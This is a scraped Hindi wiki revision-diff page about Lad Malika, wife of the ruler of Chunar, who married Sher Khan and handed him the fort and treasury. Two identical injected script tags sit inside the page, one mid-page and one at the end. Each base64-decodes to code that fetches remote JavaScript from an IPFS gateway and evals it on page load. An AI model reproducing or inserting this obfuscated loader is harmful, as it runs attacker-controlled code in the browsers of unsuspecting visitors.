Difference between revisions of "लाड मलिका"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "{{लेख प्रगति |आधार= |प्रारम्भि�)
 
Line 1: Line 1:
*लाड मलिका [[चुनार क़िला|चुनार]] के हाक़िम ताज़ ख़ाँ की पत्नी थी।  
+
'''लाड मलिका''' [[चुनार क़िला|चुनार]] के हाक़िम ताज़ ख़ाँ की पत्नी थी।  
 
*1528 ई. में उसके सौतेले पुत्र ने उसके पति की हत्या कर दी।  
 
*1528 ई. में उसके सौतेले पुत्र ने उसके पति की हत्या कर दी।  
*विधवा होने के बाद उसने शेर ख़ाँ (बाद में [[शेरशाह]]) से शादी कर ली और न केवल चुनार के क़िले पर, बल्कि उसके ख़ज़ाने पर भी उसका क़ब्ज़ा करवा दिया।  
+
*विधवा होने के बाद उसने शेर ख़ाँ (बाद में [[शेरशाह सूरी]]) से शादी कर ली और न केवल [[चुनार क़िला|चुनार के क़िले]] पर, बल्कि उसके ख़ज़ाने पर भी उसका क़ब्ज़ा करवा दिया।  
 
*इस प्रकार उसने शेरशाह को उसके विजय रथ पर अग्रसर किया, जिसके फलस्वरूप 1540 ई. में वह [[दिल्ली]] का बादशाह बन गया।
 
*इस प्रकार उसने शेरशाह को उसके विजय रथ पर अग्रसर किया, जिसके फलस्वरूप 1540 ई. में वह [[दिल्ली]] का बादशाह बन गया।
  
{{प्रचार}}
 
 
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{मध्य काल}}
 +
[[Category:चरित कोश]]
 +
[[Category:मध्य काल]]
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 14:12, 29 November 2014

lad malika chunar ke haqim taz khaan ki patni thi.

  • 1528 ee. mean usake sautele putr ne usake pati ki hatya kar di.
  • vidhava hone ke bad usane sher khaan (bad mean sherashah soori) se shadi kar li aur n keval chunar ke qile par, balki usake khazane par bhi usaka qabza karava diya.
  • is prakar usane sherashah ko usake vijay rath par agrasar kiya, jisake phalasvaroop 1540 ee. mean vah dilli ka badashah ban gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>